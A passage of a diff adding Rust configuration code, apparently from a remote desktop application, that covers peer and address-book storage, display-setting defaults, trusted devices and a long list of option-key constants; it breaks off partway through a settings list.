+    #[serde(default, deserialize_with = "deserialize_hashmap_string_string")]
+    pub ip_mac: HashMap<String, String>,
+}
+
+impl DiscoveryPeer {
+    pub fn is_same_peer(&self, other: &DiscoveryPeer) -> bool {
+        self.id == other.id && self.username == other.username
+    }
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct LanPeers {
+    #[serde(default, deserialize_with = "deserialize_vec_discoverypeer")]
+    pub peers: Vec<DiscoveryPeer>,
+}
+
+impl LanPeers {
+    pub fn load() -> LanPeers {
+        let _lock = CONFIG.read().unwrap();
+        match confy::load_path(Config::file_("_lan_peers")) {
+            Ok(peers) => peers,
+            Err(err) => {
+                log::error!("Failed to load lan peers: {}", err);
+                Default::default()
+            }
+        }
+    }
+
+    pub fn store(peers: &[DiscoveryPeer]) {
+        let f = LanPeers {
+            peers: peers.to_owned(),
+        };
+        if let Err(err) = store_path(Config::file_("_lan_peers"), f) {
+            log::error!("Failed to store lan peers: {}", err);
+        }
+    }
+
+    pub fn modify_time() -> crate::ResultType<u64> {
+        let p = Config::file_("_lan_peers");
+        Ok(fs::metadata(p)?
+            .modified()?
+            .duration_since(SystemTime::UNIX_EPOCH)?
+            .as_millis() as _)
+    }
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct UserDefaultConfig {
+    #[serde(default, deserialize_with = "deserialize_hashmap_string_string")]
+    options: HashMap<String, String>,
+}
+
+impl UserDefaultConfig {
+    fn read(key: &str) -> String {
+        let mut cfg = USER_DEFAULT_CONFIG.write().unwrap();
+        // we do so, because default config may changed in another process, but we don't sync it
+        // but no need to read every time, give a small interval to avoid too many redundant read waste
+        if cfg.1.elapsed() > Duration::from_secs(1) {
+            *cfg = (Self::load(), Instant::now());
+        }
+        cfg.0.get(key)
+    }
+
+    pub fn load() -> UserDefaultConfig {
+        Config::load_::<UserDefaultConfig>("_default")
+    }
+
+    #[inline]
+    fn store(&self) {
+        Config::store_(self, "_default");
+    }
+
+    pub fn get(&self, key: &str) -> String {
+        match key {
+            #[cfg(any(target_os = "android", target_os = "ios"))]
+            keys::OPTION_VIEW_STYLE => self.get_string(key, "adaptive", vec!["original"]),
+            #[cfg(not(any(target_os = "android", target_os = "ios")))]
+            keys::OPTION_VIEW_STYLE => self.get_string(key, "original", vec!["adaptive"]),
+            keys::OPTION_SCROLL_STYLE => {
+                self.get_string(key, "scrollauto", vec!["scrolledge", "scrollbar"])
+            }
+            keys::OPTION_IMAGE_QUALITY => {
+                self.get_string(key, "balanced", vec!["best", "low", "custom"])
+            }
+            keys::OPTION_CODEC_PREFERENCE => {
+                self.get_string(key, "auto", vec!["vp8", "vp9", "av1", "h264", "h265"])
+            }
+            keys::OPTION_CUSTOM_IMAGE_QUALITY => self.get_num_string(key, 50.0, 10.0, 0xFFF as f64),
+            keys::OPTION_CUSTOM_FPS => self.get_num_string(key, 30.0, 5.0, 120.0),
+            keys::OPTION_ENABLE_FILE_COPY_PASTE => self.get_string(key, "Y", vec!["", "N"]),
+            keys::OPTION_EDGE_SCROLL_EDGE_THICKNESS => self.get_num_string(key, 100, 20, 150),
+            keys::OPTION_TRACKPAD_SPEED => self.get_num_string(key, 100, 10, 1000),
+            _ => self
+                .get_after(key)
+                .map(|v| v.to_string())
+                .unwrap_or_default(),
+        }
+    }
+
+    pub fn set(&mut self, key: String, value: String) {
+        if !is_option_can_save(
+            &OVERWRITE_DISPLAY_SETTINGS,
+            &key,
+            &DEFAULT_DISPLAY_SETTINGS,
+            &value,
+        ) {
+            if self.options.remove(&key).is_some() {
+                self.store();
+            }
+            return;
+        }
+        if value.is_empty() {
+            self.options.remove(&key);
+        } else {
+            self.options.insert(key, value);
+        }
+        self.store();
+    }
+
+    #[inline]
+    fn get_string(&self, key: &str, default: &str, others: Vec<&str>) -> String {
+        match self.get_after(key) {
+            Some(option) => {
+                if others.contains(&option.as_str()) {
+                    option.to_owned()
+                } else {
+                    default.to_owned()
+                }
+            }
+            None => default.to_owned(),
+        }
+    }
+
+    #[inline]
+    fn get_num_string<T>(&self, key: &str, default: T, min: T, max: T) -> String
+    where
+        T: ToString + std::str::FromStr + std::cmp::PartialOrd + std::marker::Copy,
+    {
+        match self.get_after(key) {
+            Some(option) => {
+                let v: T = option.parse().unwrap_or(default);
+                if v >= min && v <= max {
+                    v.to_string()
+                } else {
+                    default.to_string()
+                }
+            }
+            None => default.to_string(),
+        }
+    }
+
+    fn get_after(&self, k: &str) -> Option<String> {
+        get_or(
+            &OVERWRITE_DISPLAY_SETTINGS,
+            &self.options,
+            &DEFAULT_DISPLAY_SETTINGS,
+            k,
+        )
+    }
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct AbPeer {
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub id: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub hash: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub username: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub hostname: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub platform: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub alias: String,
+    #[serde(default, deserialize_with = "deserialize_vec_string")]
+    pub tags: Vec<String>,
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct AbEntry {
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub guid: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub name: String,
+    #[serde(default, deserialize_with = "deserialize_vec_abpeer")]
+    pub peers: Vec<AbPeer>,
+    #[serde(default, deserialize_with = "deserialize_vec_string")]
+    pub tags: Vec<String>,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub tag_colors: String,
+}
+
+impl AbEntry {
+    pub fn personal(&self) -> bool {
+        self.name == "My address book" || self.name == "Legacy address book"
+    }
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct Ab {
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub access_token: String,
+    #[serde(default, deserialize_with = "deserialize_vec_abentry")]
+    pub ab_entries: Vec<AbEntry>,
+}
+
+impl Ab {
+    fn path() -> PathBuf {
+        let filename = format!("{}_ab", APP_NAME.read().unwrap().clone());
+        Config::path(filename)
+    }
+
+    pub fn store(json: String) {
+        if let Ok(mut file) = std::fs::File::create(Self::path()) {
+            let data = compress(json.as_bytes());
+            let max_len = 64 * 1024 * 1024;
+            if data.len() > max_len {
+                // maxlen of function decompress
+                log::error!("ab data too large, {} > {}", data.len(), max_len);
+                return;
+            }
+            if let Ok(data) = symmetric_crypt(&data, true) {
+                file.write_all(&data).ok();
+            }
+        };
+    }
+
+    pub fn load() -> Ab {
+        if let Ok(mut file) = std::fs::File::open(Self::path()) {
+            let mut data = vec![];
+            if file.read_to_end(&mut data).is_ok() {
+                if let Ok(data) = symmetric_crypt(&data, false) {
+                    let data = decompress(&data);
+                    if let Ok(ab) = serde_json::from_str::<Ab>(&String::from_utf8_lossy(&data)) {
+                        return ab;
+                    }
+                }
+            }
+        };
+        Self::remove();
+        Ab::default()
+    }
+
+    pub fn remove() {
+        std::fs::remove_file(Self::path()).ok();
+    }
+}
+
+// use default value when field type is wrong
+macro_rules! deserialize_default {
+    ($func_name:ident, $return_type:ty) => {
+        fn $func_name<'de, D>(deserializer: D) -> Result<$return_type, D::Error>
+        where
+            D: de::Deserializer<'de>,
+        {
+            Ok(de::Deserialize::deserialize(deserializer).unwrap_or_default())
+        }
+    };
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct GroupPeer {
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub id: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub username: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub hostname: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub platform: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub login_name: String,
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct GroupUser {
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub name: String,
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub display_name: String,
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct DeviceGroup {
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub name: String,
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct Group {
+    #[serde(
+        default,
+        deserialize_with = "deserialize_string",
+        skip_serializing_if = "String::is_empty"
+    )]
+    pub access_token: String,
+    #[serde(default, deserialize_with = "deserialize_vec_groupuser")]
+    pub users: Vec<GroupUser>,
+    #[serde(default, deserialize_with = "deserialize_vec_grouppeer")]
+    pub peers: Vec<GroupPeer>,
+    #[serde(default, deserialize_with = "deserialize_vec_devicegroup")]
+    pub device_groups: Vec<DeviceGroup>,
+}
+
+impl Group {
+    fn path() -> PathBuf {
+        let filename = format!("{}_group", APP_NAME.read().unwrap().clone());
+        Config::path(filename)
+    }
+
+    pub fn store(json: String) {
+        if let Ok(mut file) = std::fs::File::create(Self::path()) {
+            let data = compress(json.as_bytes());
+            let max_len = 64 * 1024 * 1024;
+            if data.len() > max_len {
+                // maxlen of function decompress
+                return;
+            }
+            if let Ok(data) = symmetric_crypt(&data, true) {
+                file.write_all(&data).ok();
+            }
+        };
+    }
+
+    pub fn load() -> Self {
+        if let Ok(mut file) = std::fs::File::open(Self::path()) {
+            let mut data = vec![];
+            if file.read_to_end(&mut data).is_ok() {
+                if let Ok(data) = symmetric_crypt(&data, false) {
+                    let data = decompress(&data);
+                    if let Ok(group) = serde_json::from_str::<Self>(&String::from_utf8_lossy(&data))
+                    {
+                        return group;
+                    }
+                }
+            }
+        };
+        Self::remove();
+        Self::default()
+    }
+
+    pub fn remove() {
+        std::fs::remove_file(Self::path()).ok();
+    }
+}
+
+#[derive(Debug, Default, Serialize, Deserialize, Clone)]
+pub struct TrustedDevice {
+    pub hwid: Bytes,
+    pub time: i64,
+    pub id: String,
+    pub name: String,
+    pub platform: String,
+}
+
+impl TrustedDevice {
+    pub fn outdate(&self) -> bool {
+        const DAYS_90: i64 = 90 * 24 * 60 * 60 * 1000;
+        self.time + DAYS_90 < crate::get_time()
+    }
+}
+
+deserialize_default!(deserialize_string, String);
+deserialize_default!(deserialize_bool, bool);
+deserialize_default!(deserialize_i32, i32);
+deserialize_default!(deserialize_vec_u8, Vec<u8>);
+deserialize_default!(deserialize_vec_string, Vec<String>);
+deserialize_default!(deserialize_vec_i32_string_i32, Vec<(i32, String, i32)>);
+deserialize_default!(deserialize_vec_discoverypeer, Vec<DiscoveryPeer>);
+deserialize_default!(deserialize_vec_abpeer, Vec<AbPeer>);
+deserialize_default!(deserialize_vec_abentry, Vec<AbEntry>);
+deserialize_default!(deserialize_vec_groupuser, Vec<GroupUser>);
+deserialize_default!(deserialize_vec_grouppeer, Vec<GroupPeer>);
+deserialize_default!(deserialize_vec_devicegroup, Vec<DeviceGroup>);
+deserialize_default!(deserialize_keypair, KeyPair);
+deserialize_default!(deserialize_size, Size);
+deserialize_default!(deserialize_hashmap_string_string, HashMap<String, String>);
+deserialize_default!(deserialize_hashmap_string_bool,  HashMap<String, bool>);
+deserialize_default!(deserialize_hashmap_resolutions, HashMap<String, Resolution>);
+
+#[inline]
+fn get_or(
+    a: &RwLock<HashMap<String, String>>,
+    b: &HashMap<String, String>,
+    c: &RwLock<HashMap<String, String>>,
+    k: &str,
+) -> Option<String> {
+    a.read()
+        .unwrap()
+        .get(k)
+        .or(b.get(k))
+        .or(c.read().unwrap().get(k))
+        .cloned()
+}
+
+#[inline]
+fn is_option_can_save(
+    overwrite: &RwLock<HashMap<String, String>>,
+    k: &str,
+    defaults: &RwLock<HashMap<String, String>>,
+    v: &str,
+) -> bool {
+    if overwrite.read().unwrap().contains_key(k)
+        || defaults.read().unwrap().get(k).map_or(false, |x| x == v)
+    {
+        return false;
+    }
+    true
+}
+
+#[inline]
+pub fn is_incoming_only() -> bool {
+    HARD_SETTINGS
+        .read()
+        .unwrap()
+        .get("conn-type")
+        .map_or(false, |x| x == ("incoming"))
+}
+
+#[inline]
+pub fn is_outgoing_only() -> bool {
+    HARD_SETTINGS
+        .read()
+        .unwrap()
+        .get("conn-type")
+        .map_or(false, |x| x == ("outgoing"))
+}
+
+#[inline]
+fn is_some_hard_opton(name: &str) -> bool {
+    HARD_SETTINGS
+        .read()
+        .unwrap()
+        .get(name)
+        .map_or(false, |x| x == ("Y"))
+}
+
+#[inline]
+pub fn is_disable_tcp_listen() -> bool {
+    is_some_hard_opton("disable-tcp-listen")
+}
+
+#[inline]
+pub fn is_disable_settings() -> bool {
+    is_some_hard_opton("disable-settings")
+}
+
+#[inline]
+pub fn is_disable_ab() -> bool {
+    is_some_hard_opton("disable-ab")
+}
+
+#[inline]
+pub fn is_disable_account() -> bool {
+    is_some_hard_opton("disable-account")
+}
+
+#[inline]
+pub fn is_disable_installation() -> bool {
+    is_some_hard_opton("disable-installation")
+}
+
+// This function must be kept the same as the one in flutter and sciter code.
+// flutter: flutter/lib/common.dart -> option2bool()
+// sciter: Does not have the function, but it should be kept the same.
+pub fn option2bool(option: &str, value: &str) -> bool {
+    if option.starts_with("enable-") {
+        value != "N"
+    } else if option.starts_with("allow-")
+        || option == "stop-service"
+        || option == keys::OPTION_DIRECT_SERVER
+        || option == "force-always-relay"
+    {
+        value == "Y"
+    } else {
+        value != "N"
+    }
+}
+
+pub fn use_ws() -> bool {
+    let option = keys::OPTION_ALLOW_WEBSOCKET;
+    option2bool(option, &Config::get_option(option))
+}
+
+pub fn allow_insecure_tls_fallback() -> bool {
+    let option = keys::OPTION_ALLOW_INSECURE_TLS_FALLBACK;
+    option2bool(option, &Config::get_option(option))
+}
+
+pub mod keys {
+    pub const OPTION_VIEW_ONLY: &str = "view_only";
+    pub const OPTION_SHOW_MONITORS_TOOLBAR: &str = "show_monitors_toolbar";
+    pub const OPTION_COLLAPSE_TOOLBAR: &str = "collapse_toolbar";
+    pub const OPTION_SHOW_REMOTE_CURSOR: &str = "show_remote_cursor";
+    pub const OPTION_FOLLOW_REMOTE_CURSOR: &str = "follow_remote_cursor";
+    pub const OPTION_FOLLOW_REMOTE_WINDOW: &str = "follow_remote_window";
+    pub const OPTION_ZOOM_CURSOR: &str = "zoom-cursor";
+    pub const OPTION_SHOW_QUALITY_MONITOR: &str = "show_quality_monitor";
+    pub const OPTION_DISABLE_AUDIO: &str = "disable_audio";
+    pub const OPTION_ENABLE_REMOTE_PRINTER: &str = "enable-remote-printer";
+    pub const OPTION_ENABLE_FILE_COPY_PASTE: &str = "enable-file-copy-paste";
+    pub const OPTION_DISABLE_CLIPBOARD: &str = "disable_clipboard";
+    pub const OPTION_LOCK_AFTER_SESSION_END: &str = "lock_after_session_end";
+    pub const OPTION_PRIVACY_MODE: &str = "privacy_mode";
+    pub const OPTION_TOUCH_MODE: &str = "touch-mode";
+    pub const OPTION_I444: &str = "i444";
+    pub const OPTION_REVERSE_MOUSE_WHEEL: &str = "reverse_mouse_wheel";
+    pub const OPTION_SWAP_LEFT_RIGHT_MOUSE: &str = "swap-left-right-mouse";
+    pub const OPTION_DISPLAYS_AS_INDIVIDUAL_WINDOWS: &str = "displays_as_individual_windows";
+    pub const OPTION_USE_ALL_MY_DISPLAYS_FOR_THE_REMOTE_SESSION: &str =
+        "use_all_my_displays_for_the_remote_session";
+    pub const OPTION_VIEW_STYLE: &str = "view_style";
+    pub const OPTION_SCROLL_STYLE: &str = "scroll_style";
+    pub const OPTION_EDGE_SCROLL_EDGE_THICKNESS: &str = "edge-scroll-edge-thickness";
+    pub const OPTION_IMAGE_QUALITY: &str = "image_quality";
+    pub const OPTION_CUSTOM_IMAGE_QUALITY: &str = "custom_image_quality";
+    pub const OPTION_CUSTOM_FPS: &str = "custom-fps";
+    pub const OPTION_CODEC_PREFERENCE: &str = "codec-preference";
+    pub const OPTION_SYNC_INIT_CLIPBOARD: &str = "sync-init-clipboard";
+    pub const OPTION_THEME: &str = "theme";
+    pub const OPTION_LANGUAGE: &str = "lang";
+    pub const OPTION_REMOTE_MENUBAR_DRAG_LEFT: &str = "remote-menubar-drag-left";
+    pub const OPTION_REMOTE_MENUBAR_DRAG_RIGHT: &str = "remote-menubar-drag-right";
+    pub const OPTION_HIDE_AB_TAGS_PANEL: &str = "hideAbTagsPanel";
+    pub const OPTION_ENABLE_CONFIRM_CLOSING_TABS: &str = "enable-confirm-closing-tabs";
+    pub const OPTION_ENABLE_OPEN_NEW_CONNECTIONS_IN_TABS: &str =
+        "enable-open-new-connections-in-tabs";
+    pub const OPTION_TEXTURE_RENDER: &str = "use-texture-render";
+    pub const OPTION_ALLOW_D3D_RENDER: &str = "allow-d3d-render";
+    pub const OPTION_ENABLE_CHECK_UPDATE: &str = "enable-check-update";
+    pub const OPTION_ALLOW_AUTO_UPDATE: &str = "allow-auto-update";
+    pub const OPTION_SYNC_AB_WITH_RECENT_SESSIONS: &str = "sync-ab-with-recent-sessions";
+    pub const OPTION_SYNC_AB_TAGS: &str = "sync-ab-tags";
+    pub const OPTION_FILTER_AB_BY_INTERSECTION: &str = "filter-ab-by-intersection";
+    pub const OPTION_ACCESS_MODE: &str = "access-mode";
+    pub const OPTION_ENABLE_KEYBOARD: &str = "enable-keyboard";
+    pub const OPTION_ENABLE_CLIPBOARD: &str = "enable-clipboard";
+    pub const OPTION_ENABLE_FILE_TRANSFER: &str = "enable-file-transfer";
+    pub const OPTION_ENABLE_CAMERA: &str = "enable-camera";
+    pub const OPTION_ENABLE_TERMINAL: &str = "enable-terminal";
+    pub const OPTION_TERMINAL_PERSISTENT: &str = "terminal-persistent";
+    pub const OPTION_ENABLE_AUDIO: &str = "enable-audio";
+    pub const OPTION_ENABLE_TUNNEL: &str = "enable-tunnel";
+    pub const OPTION_ENABLE_REMOTE_RESTART: &str = "enable-remote-restart";
+    pub const OPTION_ENABLE_RECORD_SESSION: &str = "enable-record-session";
+    pub const OPTION_ENABLE_BLOCK_INPUT: &str = "enable-block-input";
+    pub const OPTION_ALLOW_REMOTE_CONFIG_MODIFICATION: &str = "allow-remote-config-modification";
+    pub const OPTION_ALLOW_NUMERNIC_ONE_TIME_PASSWORD: &str = "allow-numeric-one-time-password";
+    pub const OPTION_ENABLE_LAN_DISCOVERY: &str = "enable-lan-discovery";
+    pub const OPTION_DIRECT_SERVER: &str = "direct-server";
+    pub const OPTION_DIRECT_ACCESS_PORT: &str = "direct-access-port";
+    pub const OPTION_WHITELIST: &str = "whitelist";
+    pub const OPTION_ALLOW_AUTO_DISCONNECT: &str = "allow-auto-disconnect";
+    pub const OPTION_AUTO_DISCONNECT_TIMEOUT: &str = "auto-disconnect-timeout";
+    pub const OPTION_ALLOW_ONLY_CONN_WINDOW_OPEN: &str = "allow-only-conn-window-open";
+    pub const OPTION_ALLOW_AUTO_RECORD_INCOMING: &str = "allow-auto-record-incoming";
+    pub const OPTION_ALLOW_AUTO_RECORD_OUTGOING: &str = "allow-auto-record-outgoing";
+    pub const OPTION_VIDEO_SAVE_DIRECTORY: &str = "video-save-directory";
+    pub const OPTION_ENABLE_ABR: &str = "enable-abr";
+    pub const OPTION_ALLOW_REMOVE_WALLPAPER: &str = "allow-remove-wallpaper";
+    pub const OPTION_ALLOW_ALWAYS_SOFTWARE_RENDER: &str = "allow-always-software-render";
+    pub const OPTION_ALLOW_LINUX_HEADLESS: &str = "allow-linux-headless";
+    pub const OPTION_ENABLE_HWCODEC: &str = "enable-hwcodec";
+    pub const OPTION_APPROVE_MODE: &str = "approve-mode";
+    pub const OPTION_VERIFICATION_METHOD: &str = "verification-method";
+    pub const OPTION_TEMPORARY_PASSWORD_LENGTH: &str = "temporary-password-length";
+    pub const OPTION_CUSTOM_RENDEZVOUS_SERVER: &str = "custom-rendezvous-server";
+    pub const OPTION_API_SERVER: &str = "api-server";
+    pub const OPTION_KEY: &str = "key";
+    pub const OPTION_ALLOW_WEBSOCKET: &str = "allow-websocket";
+    pub const OPTION_PRESET_ADDRESS_BOOK_NAME: &str = "preset-address-book-name";
+    pub const OPTION_PRESET_ADDRESS_BOOK_TAG: &str = "preset-address-book-tag";
+    pub const OPTION_PRESET_ADDRESS_BOOK_ALIAS: &str = "preset-address-book-alias";
+    pub const OPTION_PRESET_ADDRESS_BOOK_PASSWORD: &str = "preset-address-book-password";
+    pub const OPTION_PRESET_ADDRESS_BOOK_NOTE: &str = "preset-address-book-note";
+    pub const OPTION_PRESET_DEVICE_USERNAME: &str = "preset-device-username";
+    pub const OPTION_PRESET_DEVICE_NAME: &str = "preset-device-name";
+    pub const OPTION_PRESET_NOTE: &str = "preset-note";
+    pub const OPTION_ENABLE_DIRECTX_CAPTURE: &str = "enable-directx-capture";
+    pub const OPTION_ENABLE_ANDROID_SOFTWARE_ENCODING_HALF_SCALE: &str =
+        "enable-android-software-encoding-half-scale";
+    pub const OPTION_ENABLE_TRUSTED_DEVICES: &str = "enable-trusted-devices";
+    pub const OPTION_AV1_TEST: &str = "av1-test";
+    pub const OPTION_TRACKPAD_SPEED: &str = "trackpad-speed";
+    pub const OPTION_REGISTER_DEVICE: &str = "register-device";
+    pub const OPTION_RELAY_SERVER: &str = "relay-server";
+    pub const OPTION_ICE_SERVERS: &str = "ice-servers";
+    /// Maximum number of files allowed during a single file transfer request.
+    ///
+    /// Key: `file-transfer-max-files`.
+    /// Unit: number of files (not bytes).
+    ///
+    /// Behaviour:
+    /// - If set to a positive integer N, at most N files are allowed.
+    /// - If set to 0, a safe built-in default is used (see DEFAULT_MAX_VALIDATED_FILES).
+    /// - If unset, negative, or non-integer, no explicit limit is enforced for backward compatibility.
+    pub const OPTION_FILE_TRANSFER_MAX_FILES: &str = "file-transfer-max-files";
+    pub const OPTION_DISABLE_UDP: &str = "disable-udp";
+    pub const OPTION_ALLOW_INSECURE_TLS_FALLBACK: &str = "allow-insecure-tls-fallback";
+    pub const OPTION_SHOW_VIRTUAL_MOUSE: &str = "show-virtual-mouse";
+    // joystick is the virtual mouse.
+    // So `OPTION_SHOW_VIRTUAL_MOUSE` should also be set if `OPTION_SHOW_VIRTUAL_JOYSTICK` is set.
+    pub const OPTION_SHOW_VIRTUAL_JOYSTICK: &str = "show-virtual-joystick";
+    pub const OPTION_ENABLE_FLUTTER_HTTP_ON_RUST: &str = "enable-flutter-http-on-rust";
+    pub const OPTION_ALLOW_ASK_FOR_NOTE: &str = "allow-ask-for-note";
+
+    // built-in options
+    pub const OPTION_DISPLAY_NAME: &str = "display-name";
+    pub const OPTION_AVATAR: &str = "avatar";
+    pub const OPTION_PRESET_DEVICE_GROUP_NAME: &str = "preset-device-group-name";
+    pub const OPTION_PRESET_USERNAME: &str = "preset-user-name";
+    pub const OPTION_PRESET_STRATEGY_NAME: &str = "preset-strategy-name";
+    pub const OPTION_REMOVE_PRESET_PASSWORD_WARNING: &str = "remove-preset-password-warning";
+    pub const OPTION_HIDE_SECURITY_SETTINGS: &str = "hide-security-settings";
+    pub const OPTION_HIDE_NETWORK_SETTINGS: &str = "hide-network-settings";
+    pub const OPTION_HIDE_SERVER_SETTINGS: &str = "hide-server-settings";
+    pub const OPTION_HIDE_PROXY_SETTINGS: &str = "hide-proxy-settings";
+    pub const OPTION_HIDE_REMOTE_PRINTER_SETTINGS: &str = "hide-remote-printer-settings";
+    pub const OPTION_HIDE_WEBSOCKET_SETTINGS: &str = "hide-websocket-settings";
+    pub const OPTION_HIDE_STOP_SERVICE: &str = "hide-stop-service";
+
+    // Connection punch-through options
+    pub const OPTION_ENABLE_UDP_PUNCH: &str = "enable-udp-punch";
+    pub const OPTION_ENABLE_IPV6_PUNCH: &str = "enable-ipv6-punch";
+    pub const OPTION_HIDE_USERNAME_ON_CARD: &str = "hide-username-on-card";
+    pub const OPTION_HIDE_HELP_CARDS: &str = "hide-help-cards";
+    pub const OPTION_DEFAULT_CONNECT_PASSWORD: &str = "default-connect-password";
+    pub const OPTION_HIDE_TRAY: &str = "hide-tray";
+    pub const OPTION_ONE_WAY_CLIPBOARD_REDIRECTION: &str = "one-way-clipboard-redirection";
+    pub const OPTION_ALLOW_LOGON_SCREEN_PASSWORD: &str = "allow-logon-screen-password";
+    pub const OPTION_ALLOW_DEEP_LINK_PASSWORD: &str = "allow-deep-link-password";
+    pub const OPTION_ALLOW_DEEP_LINK_SERVER_SETTINGS: &str = "allow-deep-link-server-settings";
+    pub const OPTION_ONE_WAY_FILE_TRANSFER: &str = "one-way-file-transfer";
+    pub const OPTION_ALLOW_HTTPS_21114: &str = "allow-https-21114";
+    pub const OPTION_USE_RAW_TCP_FOR_API: &str = "use-raw-tcp-for-api";
+    pub const OPTION_ALLOW_HOSTNAME_AS_ID: &str = "allow-hostname-as-id";
+    pub const OPTION_HIDE_POWERED_BY_ME: &str = "hide-powered-by-me";
+    pub const OPTION_MAIN_WINDOW_ALWAYS_ON_TOP: &str = "main-window-always-on-top";
+    pub const OPTION_DISABLE_CHANGE_PERMANENT_PASSWORD: &str = "disable-change-permanent-password";
+    pub const OPTION_DISABLE_CHANGE_ID: &str = "disable-change-id";
+    pub const OPTION_DISABLE_UNLOCK_PIN: &str = "disable-unlock-pin";
+
+    // flutter local options
+    pub const OPTION_FLUTTER_REMOTE_MENUBAR_STATE: &str = "remoteMenubarState";
+    pub const OPTION_FLUTTER_PEER_SORTING: &str = "peer-sorting";
+    pub const OPTION_FLUTTER_PEER_TAB_INDEX: &str = "peer-tab-index";
+    pub const OPTION_FLUTTER_PEER_TAB_ORDER: &str = "peer-tab-order";
+    pub const OPTION_FLUTTER_PEER_TAB_VISIBLE: &str = "peer-tab-visible";
+    pub const OPTION_FLUTTER_PEER_CARD_UI_TYLE: &str = "peer-card-ui-type";
+    pub const OPTION_FLUTTER_CURRENT_AB_NAME: &str = "current-ab-name";
+    pub const OPTION_ALLOW_REMOTE_CM_MODIFICATION: &str = "allow-remote-cm-modification";
+
+    pub const OPTION_PRINTER_INCOMING_JOB_ACTION: &str = "printer-incomming-job-action";
+    pub const OPTION_PRINTER_ALLOW_AUTO_PRINT: &str = "allow-printer-auto-print";
+    pub const OPTION_PRINTER_SELECTED_NAME: &str = "printer-selected-name";
+
+    // android floating window options
+    pub const OPTION_DISABLE_FLOATING_WINDOW: &str = "disable-floating-window";
+    pub const OPTION_FLOATING_WINDOW_SIZE: &str = "floating-window-size";
+    pub const OPTION_FLOATING_WINDOW_UNTOUCHABLE: &str = "floating-window-untouchable";
+    pub const OPTION_FLOATING_WINDOW_TRANSPARENCY: &str = "floating-window-transparency";
+    pub const OPTION_FLOATING_WINDOW_SVG: &str = "floating-window-svg";
+
+    // android keep screen on
+    pub const OPTION_KEEP_SCREEN_ON: &str = "keep-screen-on";
+
+    // Server-side: keep host system awake during incoming sessions (Security setting)
+    pub const OPTION_KEEP_AWAKE_DURING_INCOMING_SESSIONS: &str =
+        "keep-awake-during-incoming-sessions";
+
+    // Client-side: keep client system awake during outgoing sessions (General setting)
+    pub const OPTION_KEEP_AWAKE_DURING_OUTGOING_SESSIONS: &str =
+        "keep-awake-during-outgoing-sessions";
+
+    pub const OPTION_DISABLE_GROUP_PANEL: &str = "disable-group-panel";
+    pub const OPTION_DISABLE_DISCOVERY_PANEL: &str = "disable-discovery-panel";
+    pub const OPTION_PRE_ELEVATE_SERVICE: &str = "pre-elevate-service";
+
+    // proxy settings
+    // The following options are not real keys, they are just used for custom client advanced settings.
+    // The real keys are in Config2::socks.
+    pub const OPTION_PROXY_URL: &str = "proxy-url";
+    pub const OPTION_PROXY_USERNAME: &str = "proxy-username";
+    pub const OPTION_PROXY_PASSWORD: &str = "proxy-password";
+
+    // DEFAULT_DISPLAY_SETTINGS, OVERWRITE_DISPLAY_SETTINGS
+    pub const KEYS_DISPLAY_SETTINGS: &[&str] = &[
+        OPTION_VIEW_ONLY,
+        OPTION_SHOW_MONITORS_TOOLBAR,
+        OPTION_COLLAPSE_TOOLBAR,
+        OPTION_SHOW_REMOTE_CURSOR,
+        OPTION_FOLLOW_REMOTE_CURSOR,
+        OPTION_FOLLOW_REMOTE_WINDOW,
+        OPTION_ZOOM_CURSOR,
+        OPTION_SHOW_QUALITY_MONITOR,
+        OPTION_DISABLE_AUDIO,
+        OPTION_ENABLE_FILE_COPY_PASTE,
+        OPTION_DISABLE_CLIPBOARD,
+        OPTION_LOCK_AFTER_SESSION_END,
+        OPTION_PRIVACY_MODE,
+        OPTION_TOUCH_MODE,
+        OPTION_I444,
+        OPTION_REVERSE_MOUSE_WHEEL,
+        OPTION_SWAP_LEFT_RIGHT_MOUSE,
